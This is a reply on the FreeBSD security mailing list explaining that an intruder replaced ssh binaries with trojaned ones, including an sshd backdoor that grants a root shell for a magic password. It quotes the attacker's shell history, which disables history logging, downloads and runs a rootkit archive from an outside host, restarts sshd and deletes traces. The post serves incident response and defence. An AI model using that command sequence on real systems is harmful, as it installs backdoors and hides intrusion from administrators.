Re: ssh binary modified
> When I try to use scp or ftp I get the following error:
> command-line: line 0: Bad configuration option: PermitLocalCommand
> lost connection
The replaced ssh/sftp is usally an older version.
I have seen such a few times.
ssh/sshd/sft and a few other binaries are replaced with trojan ones.
sshd contains a backdooor now, which allows instant root shell
with a magic password/enviroment.
/etc/ssh/sshd_config may be overwritten too.
The name of the password logs differ from time to time.
I was able to track a Kit, which allows to infect a server with
only a single user interaction, the backdoor password.
Example History:
-------------------
unset HISTFILE
unset HISTSAVE
unset SAVEFILE
cd /tmp
wget wlen.com/w/ssh.tgz
tar xvfz ssh.tgz
rm -rf ssh.tgz
cd ssh
../1
../2
../3
locate sshd
/etc/rc.d/sshd restart
cd ..
rm -rf ssh
ls
more uname.txt
ls -alF
w
who
cd .ssh
ls
-------------------
The user may have left traces,
save .history, /var/log/ and /tmp/
possibles ways:
a) week passwords.
b) leaked passwords.
e.g entered a password on a trojaned pc.
c) expoit of an application (ProFTP is often a culprit)
kidn reagrds,
- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany
- [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]
http://people.freebsd.org/~dinoex/errorlogs/
_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
討論串 (同標題文章)
完整討論串 (本文為第 6 之 6 篇):